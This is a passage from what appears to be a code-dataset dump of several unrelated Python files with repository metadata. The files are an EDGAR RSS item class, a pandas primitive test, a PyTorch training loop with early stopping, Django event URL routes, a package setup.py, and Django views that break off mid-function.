date = XmlUtil.text(XmlUtil.descendant(self, self.edgr, "filingDate"))
d = date.split("/")
if d and len(d) == 3:
self._filingDate = datetime.date(_INT(d[2]),_INT(d[0]),_INT(d[1]))
return self._filingDate
@property
def period(self):
per = XmlUtil.text(XmlUtil.descendant(self, self.edgr, "period"))
if per and len(per) == 8:
return "{0}-{1}-{2}".format(per[0:4],per[4:6],per[6:8])
return None
@property
def assignedSic(self):
return XmlUtil.text(XmlUtil.descendant(self, self.edgr, "assignedSic"))
@property
def acceptanceDatetime(self):
try:
return self._acceptanceDatetime
except AttributeError:
import datetime
self._acceptanceDatetime = None
date = XmlUtil.text(XmlUtil.descendant(self, self.edgr, "acceptanceDatetime"))
if date and len(date) == 14:
self._acceptanceDatetime = datetime.datetime(_INT(date[0:4]),_INT(date[4:6]),_INT(date[6:8]),_INT(date[8:10]),_INT(date[10:12]),_INT(date[12:14]))
return self._acceptanceDatetime
@property
def fiscalYearEnd(self):
yrEnd = XmlUtil.text(XmlUtil.descendant(self, self.edgr, "fiscalYearEnd"))
if yrEnd and len(yrEnd) == 4:
return "{0}-{1}".format(yrEnd[0:2],yrEnd[2:4])
return None
@property
def htmlUrl(self): # main filing document
htmlDocElt = XmlUtil.descendant(self, self.edgr, "xbrlFile", attrName=self.edgrSequence, attrValue="1")
if htmlDocElt is not None:
return htmlDocElt.get(self.edgrUrl)
return None
@property
def url(self):
try:
return self._url
except AttributeError:
self._url = None
for instDocElt in XmlUtil.descendants(self, self.edgr, "xbrlFile"):
if instDocElt.get(self.edgrType).endswith(".INS") or instDocElt.get(self.edgrInlineXBRL) == "true":
self._url = instDocElt.get(self.edgrUrl)
break
return self._url
@property
def enclosureUrl(self):
return XmlUtil.childAttr(self, None, "enclosure", "url")
@property
def zippedUrl(self):
enclosure = XmlUtil.childAttr(self, None, "enclosure", "url")
if enclosure:
# modify url to use zip file
_path, sep, file = (self.url or "").rpartition("/")
# return path + sep + self.accessionNumber + "-xbrl.zip" + sep + file
return enclosure + sep + file
else: # no zipped enclosure, just use unzipped file
return self.url
@property
def htmURLs(self):
try:
return self._htmURLs
except AttributeError:
self._htmURLs = [
(instDocElt.get(self.edgrDescription),instDocElt.get(self.edgrUrl))
for instDocElt in XmlUtil.descendants(self, self.edgr, "xbrlFile")
if instDocElt.get(self.edgrFile).endswith(".htm")]
return self._htmURLs
@property
def primaryDocumentURL(self):
try:
return self._primaryDocumentURL
except AttributeError:
formType = self.formType
self._primaryDocumentURL = None
for instDocElt in XmlUtil.descendants(self, self.edgr, "xbrlFile"):
if instDocElt.get(self.edgrType) == formType:
self._primaryDocumentURL = instDocElt.get(self.edgrUrl)
break
return self._primaryDocumentURL
def setResults(self, modelXbrl):
self.results = []
self.assertionUnsuccessful = False
# put error codes first, sorted, then assertion result (dict's)
self.status = "pass"
for error in modelXbrl.errors:
if isinstance(error,dict): # assertion results
self.assertions = error
for countSuccessful, countNotsuccessful in error.items():
if countNotsuccessful > 0:
self.assertionUnsuccessful = True
self.status = "unsuccessful"
else: # error code results
self.results.append(error)
self.status = "fail" # error code
self.results.sort()
@property
def propertyView(self):
return (("CIK", self.cikNumber),
("company", self.companyName),
("published", self.pubDate),
("form type", self.formType),
("filing date", self.filingDate),
("period", self.period),
("year end", self.fiscalYearEnd),
("status", self.status),
("instance", os.path.basename(self.url)),
)
def __repr__(self):
return ("rssItem[{0}]{1})".format(self.objectId(),self.propertyView))
| 36.271493 | 162 | 0.58508 |
e0ce55a54be57bb281a21e6d9008a577d9153b7a | 1,216 | py | Python | nlp_primitives/tests/test_upper_case_count.py | mikewcasale/nlp_primitives | e42ff518f78fe2398c156e559b6d0fe222fd5cdd | [
"BSD-3-Clause"
] | 2 | 2021-04-05T03:56:21.000Z | 2022-03-09T09:05:55.000Z | nlp_primitives/tests/test_upper_case_count.py | mikewcasale/nlp_primitives | e42ff518f78fe2398c156e559b6d0fe222fd5cdd | [
"BSD-3-Clause"
] | null | null | null | nlp_primitives/tests/test_upper_case_count.py | mikewcasale/nlp_primitives | e42ff518f78fe2398c156e559b6d0fe222fd5cdd | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import pandas as pd
from ..upper_case_count import UpperCaseCount
from ..utils import PrimitiveT, find_applicable_primitives, valid_dfs
class TestUpperCaseCount(PrimitiveT):
primitive = UpperCaseCount
def test_strings(self):
x = pd.Series(['This IS a STRING.',
'Testing AaA',
'Testing AAA-BBB',
'testing aaa'])
primitive_func = self.primitive().get_function()
answers = pd.Series([9.0, 3.0, 7.0, 0.0])
pd.testing.assert_series_equal(primitive_func(x), answers, check_names=False)
def test_nan(self):
x = pd.Series([np.nan,
'',
'This IS a STRING.'])
primitive_func = self.primitive().get_function()
answers = pd.Series([np.nan, 0.0, 9.0])
pd.testing.assert_series_equal(primitive_func(x), answers, check_names=False)
def test_with_featuretools(self, es):
transform, aggregation = find_applicable_primitives(self.primitive)
primitive_instance = self.primitive()
transform.append(primitive_instance)
valid_dfs(es, aggregation, transform, self.primitive.name.upper())
| 36.848485 | 85 | 0.630757 |
7a9b98618b92d87198df75daa8c6d19fb3676236 | 28,208 | py | Python | behavenet/fitting/training.py | cxrodgers/behavenet | 061b0b30f5d03b9d5be0dd965d81dc37b7409070 | [
"MIT"
] | null | null | null | behavenet/fitting/training.py | cxrodgers/behavenet | 061b0b30f5d03b9d5be0dd965d81dc37b7409070 | [
"MIT"
] | null | null | null | behavenet/fitting/training.py | cxrodgers/behavenet | 061b0b30f5d03b9d5be0dd965d81dc37b7409070 | [
"MIT"
] | null | null | null | """Functions and classes for fitting PyTorch models with stochastic gradient descent."""
import copy
import os
import numpy as np
from tqdm import tqdm
import torch
from torch import nn
from sklearn.metrics import r2_score, accuracy_score
from behavenet.fitting.eval import export_latents
from behavenet.fitting.eval import export_predictions
# TODO: use epoch number as rng seed so that batches are served in a controllable way?
# TODO: make it easy to finish training if unexpectedly stopped
# TODO: save models at prespecified intervals (check ae recon as a func of epoch w/o retraining)
# TODO: fix early stopping (at least for AEs)
class FitMethod(object):
"""Base method for defining model losses and tracking loss metrics.
Loss metrics are tracked for the aggregate dataset (potentially spanning multiple sessions) as
well as session-specific metrics for easier downstream plotting.
"""
def __init__(self, model, metric_strs, n_datasets=1):
"""
Parameters
----------
model : :obj:`PyTorch` model
metric_strs : :obj:`list` of :obj:`strs`
names of metrics to be tracked, e.g. 'epoch', 'batch', 'train_loss', etc.
n_datasets : :obj:`int`
total number of datasets (sessions) served by data generator
"""
self.model = model
self.metrics = {}
self.n_datasets = n_datasets
dtype_strs = ['train', 'val', 'test', 'curr']
# aggregate metrics over all datasets
for dtype in dtype_strs:
self.metrics[dtype] = {}
for metric in metric_strs:
self.metrics[dtype][metric] = 0
# separate metrics by dataset
if self.n_datasets > 1:
self.metrics_by_dataset = []
for dataset in range(self.n_datasets):
self.metrics_by_dataset.append({})
for dtype in dtype_strs:
self.metrics_by_dataset[dataset][dtype] = {}
for metric in metric_strs:
self.metrics_by_dataset[dataset][dtype][metric] = 0
else:
self.metrics_by_dataset = None
def get_parameters(self):
"""Get all model parameters that have gradient updates turned on."""
return filter(lambda p: p.requires_grad, self.model.parameters())
def calc_loss(self, data, **kwargs):
"""Calculate loss on data."""
raise NotImplementedError
def get_loss(self, dtype):
"""Return loss aggregated over all datasets.
Parameters
----------
dtype : :obj:`str`
datatype to calculate loss for (e.g. 'train', 'val', 'test')
"""
return self.metrics[dtype]['loss'] / self.metrics[dtype]['batches']
def create_metric_row(
self, dtype, epoch, batch, dataset, trial, best_epoch=None,
by_dataset=False, *args, **kwargs):
"""Export metrics and other data (e.g. epoch) for logging train progress.
Parameters
----------
dtype : :obj:`str`
'train' | 'val' | 'test'
epoch : :obj:`int`
current training epoch
batch : :obj:`int`
current training batch
dataset : :obj:`int`
dataset id for current batch
trial : :obj:`int` or :obj:`NoneType`
trial id within the current dataset
best_epoch : :obj:`int`, optional
best current training epoch
by_dataset : :obj:`bool`, optional
:obj:`True` to return metrics for a specific dataset, :obj:`False` to return metrics
aggregated over multiple datasets
Returns
-------
:obj:`dict`
aggregated metrics for current epoch/batch
"""
if by_dataset and self.n_datasets > 1:
loss = self.metrics_by_dataset[dataset][dtype]['loss'] \
/ self.metrics_by_dataset[dataset][dtype]['batches']
else:
dataset = -1
loss = self.metrics[dtype]['loss'] / self.metrics[dtype]['batches']
if dtype == 'train':
metric_row = {
'epoch': epoch,
'batch': batch,
'dataset': dataset,
'trial': trial,
'tr_loss': loss}
elif dtype == 'val':
metric_row = {
'epoch': epoch,
'batch': batch,
'dataset': dataset,
'trial': trial,
'val_loss': loss,
'best_val_epoch': best_epoch}
elif dtype == 'test':
metric_row = {
'epoch': epoch,
'batch': batch,
'dataset': dataset,
'trial': trial,
'test_loss': loss}
else:
raise ValueError("%s is an invalid data type" % dtype)
return metric_row
def reset_metrics(self, dtype):
"""Reset all metrics.
Parameters
----------
dtype : :obj:`str`
datatype to reset metrics for (e.g. 'train', 'val', 'test')
"""
# reset aggregate metrics
for key in self.metrics[dtype].keys():
self.metrics[dtype][key] = 0
# reset separated metrics
if self.n_datasets > 1:
for dataset in range(self.n_datasets):
for key in self.metrics_by_dataset[dataset][dtype].keys():
self.metrics_by_dataset[dataset][dtype][key] = 0
def update_metrics(self, dtype, dataset=None):
"""Update metrics for a specific dtype/dataset.
Parameters
----------
dtype : :obj:`str`
dataset type to update metrics for (e.g. 'train', 'val', 'test')
dataset : :obj:`int` or :obj:`NoneType`, optional
if :obj:`NoneType`, updates the aggregated metrics; if :obj:`int`, updates the
associated dataset/session
"""
for key in self.metrics[dtype].keys():
if self.metrics['curr'][key] is not None:
# update aggregate methods
self.metrics[dtype][key] += self.metrics['curr'][key]
# update separated metrics
if dataset is not None and self.n_datasets > 1:
self.metrics_by_dataset[dataset][dtype][key] += \
self.metrics['curr'][key]
# reset current metrics
self.metrics['curr'][key] = 0
class AELoss(FitMethod):
"""MSE loss for non-variational autoencoders."""
def __init__(self, model, n_datasets=1):
metric_strs = ['batches', 'loss']
super().__init__(model, metric_strs, n_datasets=n_datasets)
def calc_loss(self, data, dataset=0, **kwargs):
"""Calculate MSE loss for autoencoder.
The batch is split into chunks if larger than a hard-coded `chunk_size` to keep memory
requirements low; gradients are accumulated across all chunks before a gradient step is
taken.
Parameters
----------
data : :obj:`dict`
batch of data; keys should include 'images' and 'masks', if necessary
dataset : :obj:`int`, optional
used for session-specific io layers
"""
if self.model.hparams['device'] == 'cuda':
data = {key: val.to('cuda') for key, val in data.items()}
y = data['images'][0]
if 'masks' in data:
masks = data['masks'][0]
else:
masks = None
chunk_size = 200
batch_size = y.shape[0]
if batch_size > chunk_size:
# split into chunks
n_chunks = int(np.ceil(batch_size / chunk_size))
loss_val = 0
for chunk in range(n_chunks):
idx_beg = chunk * chunk_size
idx_end = np.min([(chunk + 1) * chunk_size, batch_size])
y_mu, _ = self.model(y[idx_beg:idx_end], dataset=dataset)
if masks is not None:
loss = torch.mean((
(y[idx_beg:idx_end] - y_mu) ** 2) *
masks[idx_beg:idx_end])
else:
loss = torch.mean((y[idx_beg:idx_end] - y_mu) ** 2)
# compute gradients
loss.backward()
# get loss value (weighted by batch size)
loss_val += loss.item() * (idx_end - idx_beg)
loss_val /= y.shape[0]
else:
y_mu, _ = self.model(y, dataset=dataset)
# define loss
if masks is not None:
loss = torch.mean(((y - y_mu)**2) * masks)
else:
loss = torch.mean((y - y_mu) ** 2)
# compute gradients
loss.backward()
# get loss value
loss_val = loss.item()
# store current metrics
self.metrics['curr']['loss'] = loss_val
self.metrics['curr']['batches'] = 1
class NLLLoss(FitMethod):
"""Negative log-likelihood loss for supervised models (en/decoders)."""
def __init__(self, model, n_datasets=1):
if n_datasets > 1:
raise ValueError('NLLLoss only supports single datasets')
metric_strs = ['batches', 'loss', 'r2', 'fc']
super().__init__(model, metric_strs, n_datasets=n_datasets)
# choose loss based on noise distribution of the model
if self.model.hparams['noise_dist'] == 'gaussian':
self._loss = nn.MSELoss()
elif self.model.hparams['noise_dist'] == 'gaussian-full':
from behavenet.fitting.losses import GaussianNegLogProb
self._loss = GaussianNegLogProb() # model holds precision mat
elif self.model.hparams['noise_dist'] == 'poisson':
self._loss = nn.PoissonNLLLoss(log_input=False)
elif self.model.hparams['noise_dist'] == 'categorical':
self._loss = nn.CrossEntropyLoss()
else:
raise ValueError('"%s" is not a valid noise dist' % self.model.hparams['noise_dist'])
def calc_loss(self, data, **kwargs):
"""Calculate negative log-likelihood loss for supervised models.
The batch is split into chunks if larger than a hard-coded `chunk_size` to keep memory
requirements low; gradients are accumulated across all chunks before a gradient step is
taken.
Parameters
----------
data : :obj:`dict`
signals are of shape (1, time, n_channels)
"""
if self.model.hparams['device'] == 'cuda':
data = {key: val.to('cuda') for key, val in data.items()}
predictors = data[self.model.hparams['input_signal']][0]
targets = data[self.model.hparams['output_signal']][0]
max_lags = self.model.hparams['n_max_lags']
chunk_size = 200
batch_size = targets.shape[0]
if batch_size > chunk_size:
# split into chunks
n_chunks = int(np.ceil(batch_size / chunk_size))
outputs_all = []
loss_val = 0
for chunk in range(n_chunks):
# take chunks of size chunk_size, plus overlap due to max_lags
idx_beg = np.max([chunk * chunk_size - max_lags, 0])
idx_end = np.min([(chunk + 1) * chunk_size + max_lags, batch_size])
outputs, precision = self.model(predictors[idx_beg:idx_end])
# define loss on allowed window of data
if self.model.hparams['noise_dist'] == 'gaussian-full':
loss = self._loss(
outputs[max_lags:-max_lags],
targets[idx_beg:idx_end][max_lags:-max_lags],
precision[max_lags:-max_lags])
else:
loss = self._loss(
outputs[max_lags:-max_lags],
targets[idx_beg:idx_end][max_lags:-max_lags])
# compute gradients
loss.backward()
# get loss value (weighted by batch size)
loss_val += loss.item() * outputs[max_lags:-max_lags].shape[0]
outputs_all.append(
outputs[max_lags:-max_lags].cpu().detach().numpy())
loss_val /= targets.shape[0]
outputs_all = np.concatenate(outputs_all, axis=0)
else:
outputs, precision = self.model(predictors)
# define loss on allowed window of data
if self.model.hparams['noise_dist'] == 'gaussian-full':
loss = self._loss(
outputs[max_lags:-max_lags],
targets[max_lags:-max_lags],
precision[max_lags:-max_lags])
else:
loss = self._loss(
outputs[max_lags:-max_lags],
targets[max_lags:-max_lags])
# compute gradients
loss.backward()
# get loss value
loss_val = loss.item()
outputs_all = outputs[max_lags:-max_lags].cpu().detach().numpy()
if self.model.hparams['noise_dist'] == 'gaussian' \
or self.model.hparams['noise_dist'] == 'gaussian-full':
# use variance-weighted r2s to ignore small-variance latents
r2 = r2_score(
targets[max_lags:-max_lags].cpu().detach().numpy(),
outputs_all,
multioutput='variance_weighted')
fc = None
elif self.model.hparams['noise_dist'] == 'poisson':
raise NotImplementedError
elif self.model.hparams['noise_dist'] == 'categorical':
r2 = None
fc = accuracy_score(
targets[max_lags:-max_lags].cpu().detach().numpy(),
np.argmax(outputs_all, axis=1))
else:
raise ValueError(
'"%s" is not a valid noise_dist' %
self.model.hparams['noise_dist'])
# store current metrics
self.metrics['curr']['loss'] = loss_val
self.metrics['curr']['r2'] = r2
self.metrics['curr']['fc'] = fc
self.metrics['curr']['batches'] = 1
def create_metric_row(
self, dtype, epoch, batch, dataset, trial, best_epoch=None, by_dataset=False,
*args, **kwargs):
"""Export metrics and other data (e.g. epoch) for logging train progress.
Parameters
----------
dtype : :obj:`str`
'train' | 'val' | 'test'
epoch : :obj:`int`
current training epoch
batch : :obj:`int`
current training batch
dataset : :obj:`int`
dataset id for current batch
trial : :obj:`int` or :obj:`NoneType`
trial id within the current dataset
best_epoch : :obj:`int`, optional
best current training epoch
by_dataset : :obj:`bool`, optional
:obj:`True` to return metrics for a specific dataset, :obj:`False` to return metrics
aggregated over multiple datasets
Returns
-------
:obj:`dict`
aggregated metrics for current epoch/batch
"""
norm = self.metrics[dtype]['batches']
loss = self.metrics[dtype]['loss'] / norm
r2 = self.metrics[dtype]['r2'] / norm
fc = self.metrics[dtype]['fc'] / norm
if dtype == 'train':
metric_row = {
'epoch': epoch,
'batch': batch,
'dataset': dataset,
'trial': trial,
'tr_loss': loss,
'tr_r2': r2,
'tr_fc': fc}
elif dtype == 'val':
metric_row = {
'epoch': epoch,
'batch': batch,
'dataset': dataset,
'trial': trial,
'val_loss': loss,
'val_r2': r2,
'val_fc': fc,
'best_val_epoch': best_epoch}
elif dtype == 'test':
metric_row = {
'epoch': epoch,
'batch': batch,
'dataset': dataset,
'trial': trial,
'test_loss': loss,
'test_r2': r2,
'test_fc': fc}
else:
raise ValueError("%s is an invalid data type" % dtype)
return metric_row
class EarlyStopping(object):
"""Stop training when a monitored quantity has stopped improving."""
def __init__(self, history=10, min_epochs=10):
"""
Parameters
----------
history : :obj:`int`
number of previous checks to average over when checking for increase in loss
min_epochs : :obj:`int`
minimum number of epochs for training
"""
self.history = history
self.min_epochs = min_epochs
# keep track of `history` most recent losses
self.prev_losses = np.full(self.history, fill_value=np.nan)
self.best_epoch = 0
self.best_loss = np.inf
self.stopped_epoch = 0
self.should_stop = False
def on_val_check(self, epoch, curr_loss):
"""Check to see if loss has begun to increase on validation data for current epoch.
Rather than returning the results of the check, this method updates the class attribute
:obj:`should_stop`, which is checked externally by the fitting function.
Parameters
----------
epoch : :obj:`int`
current epoch
curr_loss : :obj:`float`
current loss
"""
prev_mean = np.nanmean(self.prev_losses)
self.prev_losses = np.roll(self.prev_losses, 1)
self.prev_losses[0] = curr_loss
curr_mean = np.nanmean(self.prev_losses)
# update best loss and epoch that it happened at
if curr_loss < self.best_loss:
self.best_loss = curr_loss
self.best_epoch = epoch
# check if smoothed loss is starting to increase; exit training if so
if epoch > max(self.min_epochs, self.history) \
and curr_mean >= prev_mean:
print('\n== early stopping criteria met; exiting train loop ==')
print('training epochs: %d' % epoch)
print('end cost: %04f' % curr_loss)
print('best epoch: %i' % self.best_epoch)
print('best cost: %04f\n' % self.best_loss)
self.stopped_epoch = epoch
self.should_stop = True
def fit(hparams, model, data_generator, exp, method='ae'):
"""Fit pytorch models with stochastic gradient descent and early stopping.
Training parameters such as min epochs, max epochs, and early stopping hyperparameters are
specified in :obj:`hparams`.
For more information on how model losses are calculated, see the classes that inherit from
:class:`FitMethod`.
For more information on how early stopping is implemented, see the class
:class:`EarlyStopping`.
Training progess is monitored by calculating the model loss on both training data and
validation data. The training loss is calculated each epoch, and the validation loss is
calculated according to the :obj:`hparams` key :obj:`'val_check_interval'`. For example, if
:obj:`val_check_interval=5` then the validation loss is calculated every 5 epochs. If
:obj:`val_check_interval=0.5` then the validation loss is calculated twice per epoch - after
the first half of the batches have been processed, then again after all batches have been
processed.
Monitored metrics are saved in a csv file in the model directory. This logging is handled by
the :obj:`testtube` package.
At the end of training, model outputs (such as latents for autoencoder models, or predictions
for decoder models) can optionally be computed and saved using the :obj:`hparams` keys
:obj:`'export_latents'` or :obj:`'export_predictions'`, respectively.
Parameters
----------
hparams : :obj:`dict`
model/training specification
model : :obj:`PyTorch` model
model to fit
data_generator : :obj:`ConcatSessionsGenerator` object
data generator to serve data batches
exp : :obj:`test_tube.Experiment` object
for logging training progress
method : :obj:`str`
specifies the type of loss - 'ae' | 'nll'
"""
# check inputs
if method == 'ae':
loss = AELoss(model, n_datasets=data_generator.n_datasets)
elif method == 'nll':
loss = NLLLoss(model, n_datasets=data_generator.n_datasets)
else:
raise ValueError('"%s" is an invalid fitting method' % method)
# optimizer set-up
optimizer = torch.optim.Adam(
loss.get_parameters(), lr=hparams['learning_rate'], weight_decay=hparams.get('l2_reg', 0),
amsgrad=True)
# enumerate batches on which validation metrics should be recorded
best_val_loss = np.inf
best_val_epoch = None
best_val_model = None
val_check_batch = np.linspace(
data_generator.n_tot_batches['train'] * hparams['val_check_interval'],
data_generator.n_tot_batches['train'] * (hparams['max_n_epochs']+1),
int((hparams['max_n_epochs'] + 1) / hparams['val_check_interval'])).astype('int')
# early stopping set-up
if hparams['enable_early_stop']:
early_stop = EarlyStopping(
history=hparams['early_stop_history'], min_epochs=hparams['min_n_epochs'])
else:
early_stop = None
i_epoch = 0
for i_epoch in range(hparams['max_n_epochs'] + 1):
# Note: the 0th epoch has no training (randomly initialized model is evaluated) so we cycle
# through `max_n_epochs` training epochs
if hparams['max_n_epochs'] < 10:
print('epoch %i/%i' % (i_epoch, hparams['max_n_epochs']))
elif hparams['max_n_epochs'] < 100:
print('epoch %02i/%02i' % (i_epoch, hparams['max_n_epochs']))
elif hparams['max_n_epochs'] < 1000:
print('epoch %03i/%03i' % (i_epoch, hparams['max_n_epochs']))
elif hparams['max_n_epochs'] < 10000:
print('epoch %04i/%04i' % (i_epoch, hparams['max_n_epochs']))
elif hparams['max_n_epochs'] < 100000:
print('epoch %05i/%05i' % (i_epoch, hparams['max_n_epochs']))
else:
print('epoch %i/%i' % (i_epoch, hparams['max_n_epochs']))
# control how data is batched to that models can be restarted from a particular epoch
torch.manual_seed(i_epoch) # order of trials within sessions
np.random.seed(i_epoch) # order of sessions
loss.reset_metrics('train')
data_generator.reset_iterators('train')
for i_train in tqdm(range(data_generator.n_tot_batches['train'])):
model.train()
# zero out gradients. Don't want gradients from previous iterations
optimizer.zero_grad()
# get next minibatch and put it on the device
data, dataset = data_generator.next_batch('train')
# call the appropriate loss function
loss.calc_loss(data, dataset=dataset)
loss.update_metrics('train', dataset=dataset)
# step (evaluate untrained network on epoch 0)
if i_epoch > 0:
optimizer.step()
# check validation according to schedule
curr_batch = (i_train + 1) + i_epoch * data_generator.n_tot_batches['train']
if np.any(curr_batch == val_check_batch):
loss.reset_metrics('val')
data_generator.reset_iterators('val')
model.eval()
for i_val in range(data_generator.n_tot_batches['val']):
# get next minibatch and put it on the device
data, dataset = data_generator.next_batch('val')
# call the appropriate loss function
loss.calc_loss(data, dataset=dataset)
loss.update_metrics('val', dataset=dataset)
# save best val model
if loss.get_loss('val') < best_val_loss:
best_val_loss = loss.get_loss('val')
filepath = os.path.join(
hparams['expt_dir'], 'version_%i' % exp.version, 'best_val_model.pt')
torch.save(model.state_dict(), filepath)
model.hparams = None
best_val_model = copy.deepcopy(model)
model.hparams = hparams
best_val_model.hparams = hparams
best_val_epoch = i_epoch
# export aggregated metrics on train/val data
exp.log(loss.create_metric_row(
'train', i_epoch, i_train, -1, trial=-1,
by_dataset=False, best_epoch=best_val_epoch))
exp.log(loss.create_metric_row(
'val', i_epoch, i_train, -1, trial=-1,
by_dataset=False, best_epoch=best_val_epoch))
# export individual session metrics on train/val data
if data_generator.n_datasets > 1:
for dataset in range(data_generator.n_datasets):
exp.log(loss.create_metric_row(
'train', i_epoch, i_train, dataset, trial=-1,
by_dataset=True, best_epoch=best_val_epoch))
exp.log(loss.create_metric_row(
'val', i_epoch, i_train, dataset, trial=-1,
by_dataset=True, best_epoch=best_val_epoch))
exp.save()
elif (i_train + 1) % data_generator.n_tot_batches['train'] == 0:
# export training metrics at end of epoch
# export aggregated metrics on train/val data
exp.log(loss.create_metric_row(
'train', i_epoch, i_train, -1, trial=-1,
by_dataset=False, best_epoch=best_val_epoch))
# export individual session metrics on train/val data
if data_generator.n_datasets > 1:
for dataset in range(data_generator.n_datasets):
exp.log(loss.create_metric_row(
'train', i_epoch, i_train, dataset, trial=-1,
by_dataset=True, best_epoch=best_val_epoch))
exp.save()
if hparams['enable_early_stop']:
early_stop.on_val_check(i_epoch, loss.get_loss('val'))
if early_stop.should_stop:
break
# save out last model
if hparams.get('save_last_model', False):
filepath = os.path.join(hparams['expt_dir'], 'version_%i' % exp.version, 'last_model.pt')
torch.save(model.state_dict(), filepath)
# compute test loss
if method == 'ae':
test_loss = AELoss(best_val_model, n_datasets=data_generator.n_datasets)
elif method == 'nll':
test_loss = NLLLoss(best_val_model, n_datasets=data_generator.n_datasets)
else:
raise ValueError('"%s" is an invalid fitting method' % method)
test_loss.reset_metrics('test')
data_generator.reset_iterators('test')
best_val_model.eval()
for i_test in range(data_generator.n_tot_batches['test']):
# get next minibatch and put it on the device
data, dataset = data_generator.next_batch('test')
# call the appropriate loss function
test_loss.reset_metrics('test')
test_loss.calc_loss(data, dataset=dataset)
test_loss.update_metrics('test', dataset=dataset)
# calculate metrics for each *batch* (rather than whole dataset)
exp.log(test_loss.create_metric_row(
'test', i_epoch, i_test, dataset, trial=data['batch_idx'].item(), by_dataset=True))
exp.save()
# export latents
if method == 'ae' and hparams['export_latents']:
print('exporting latents')
export_latents(data_generator, best_val_model)
elif method == 'nll' and hparams['export_predictions']:
print('exporting predictions')
export_predictions(data_generator, best_val_model)
| 38.641096 | 99 | 0.571185 |
5f347a2f6bcf51d12bb68330a9cb5638158188ce | 1,988 | py | Python | events/urls.py | jdevera/pythoncanarias_web | 465e8b0a054726e29b1029f1dffe11f913e40bcc | [
"MIT"
] | null | null | null | events/urls.py | jdevera/pythoncanarias_web | 465e8b0a054726e29b1029f1dffe11f913e40bcc | [
"MIT"
] | null | null | null | events/urls.py | jdevera/pythoncanarias_web | 465e8b0a054726e29b1029f1dffe11f913e40bcc | [
"MIT"
] | null | null | null | from django.urls import path
from . import views
app_name = 'events'
urlpatterns = [
path('', views.index, name='index'),
path('archive/', views.past_events, name='past_events'),
path('<slug:slug>/', views.detail_event, name='detail_event'),
path(
'<slug:slug>/waiting-list/',
views.waiting_list,
name='waiting_list',
),
path(
'<slug:slug>/waiting-list/accepted/',
views.waiting_list_accepted,
name='waiting_list_accepted',
),
path(
'<slug:slug>/refund/',
views.refund,
name='refund',
),
path(
'<slug:slug>/refund/accepted/<int:pk>/',
views.refund_accepted,
name='refund_accepted',
),
path(
'<slug:slug>/trade/<uuid:sell_code>/<uuid:buy_code>/',
views.trade,
name='trade',
),
path(
'<slug:slug>/resend_ticket/',
views.resend_ticket,
name='resend_ticket',
),
path(
'<slug:slug>/resend_ticket/confirmation',
views.resend_confirmation,
name='resend_confirmation',
),
path('<slug:slug>/buy/', views.buy_ticket, name='buy_ticket'),
path(
'ticket/purchase/bought/<int:id_article>/',
views.article_bought,
name='article_bought',
),
path(
'ticket/purchase/<int:id_article>/',
views.ticket_purchase,
name='ticket_purchase',
),
path(
'ticket/purchase/<int:id_article>/nocc/', # no credit card
views.ticket_purchase_nocc,
name='ticket_purchase_nocc',
),
path('<slug:slug>/raffle/', views.raffle, name='raffle'),
path('<slug:slug>/raffle/<int:gift_id>/',
views.raffle_gift,
name='raffle_gift'),
path('<slug:slug>/raffle/<int:gift_id>/match/',
views.raffle_gift, {'match': True},
name='raffle_gift_match'),
path('<slug:slug>/raffle/results/',
views.raffle_results,
name='raffle_results'),
]
| 27.232877 | 67 | 0.577968 |
0c15e1fec2ec062eb7cfbbc333f94cae23814e44 | 1,974 | py | Python | setup.py | csinva/interpretability-implementations-demos | 0223114225d0e077007b1ad49f63b64f3ff5ee15 | [
"MIT"
] | 102 | 2019-07-16T13:45:35.000Z | 2020-09-14T19:12:49.000Z | setup.py | csinva/interpretability-implementations-demos | 0223114225d0e077007b1ad49f63b64f3ff5ee15 | [
"MIT"
] | 2 | 2020-01-03T20:47:14.000Z | 2020-01-03T21:17:39.000Z | setup.py | csinva/interpretability-implementations-demos | 0223114225d0e077007b1ad49f63b64f3ff5ee15 | [
"MIT"
] | 8 | 2019-08-09T08:40:34.000Z | 2020-09-06T17:51:10.000Z | from os import path
import setuptools
path_to_repo = path.abspath(path.dirname(__file__))
with open(path.join(path_to_repo, 'readme.md'), encoding='utf-8') as f:
long_description = f.read()
required_pypi = [
'matplotlib',
'mlxtend>=0.18.0', # some lower version are missing fpgrowth
'numpy',
'pandas',
'requests', # used in c4.5
'scipy',
'scikit-learn', # 0.23+ only works on py3.6+
'tqdm', # used in BART
]
extra_deps = [
'cvxpy', # optionally requires cvxpy for slim
'corels', # optinally requires corels for optimalrulelistclassifier
'gosdt-deprecated', # optionally requires gosdt for optimaltreeclassifier
'irf', # optionally require irf for iterativeRandomForestClassifier
]
setuptools.setup(
name="imodels",
version="1.3.0",
author="Chandan Singh, Keyan Nasseri, Bin Yu, and others",
author_email="chandan_singh@berkeley.edu",
description="Implementations of various interpretable models",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/csinva/imodels",
packages=setuptools.find_packages(
exclude=['tests', 'tests.*', '*.test.*']
),
install_requires=required_pypi,
extras_require={
'dev': [
'dvu',
'gdown',
# 'irf',
'jupyter',
'jupytext',
'matplotlib',
# 'pdoc3', # for building docs
'pytest',
'pytest-cov',
# 'seaborn', # in bartpy.diagnostics.features
'slurmpy',
# 'statsmodels', # in bartpy.diagnostics.diagnostics
# 'torch', # for neural-net-integrated models
'tqdm',
'pmlb',
]
},
python_requires='>=3.6',
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 29.909091 | 78 | 0.600811 |
0807fc13281b87d5c31d3f421ab66143a267bffa | 1,165 | py | Python | app/views.py | LogicPi-cn/django-dashboard-material | 7be3abef34e809ee12ed14d4a65df2e12008d485 | [
"MIT"
] | null | null | null | app/views.py | LogicPi-cn/django-dashboard-material | 7be3abef34e809ee12ed14d4a65df2e12008d485 | [
"MIT"
] | null | null | null | app/views.py | LogicPi-cn/django-dashboard-material | 7be3abef34e809ee12ed14d4a65df2e12008d485 | [
"MIT"
] | null | null | null | # -*- encoding: utf-8 -*-
"""
License: MIT
Copyright (c) 2019 - present AppSeed.us
"""
from django.contrib.auth.decorators import login_required
from django.shortcuts import render, get_object_or_404, redirect
from django.template import loader
from django.http import HttpResponse
from django import template
@login_required(login_url="/login/")
def index(request):
return render(request, "index.html")
@login_required(login_url="/login/")
def pages(request):
context = {}
# All resource paths end in .html.
# Pick out the html file name from the url. And load that template.
try:
load_template = request.path.split('/')[-1]
html_template = loader.get_template( load_template )
return HttpResponse(html_template.render(context, request))
except template.TemplateDoesNotExist:
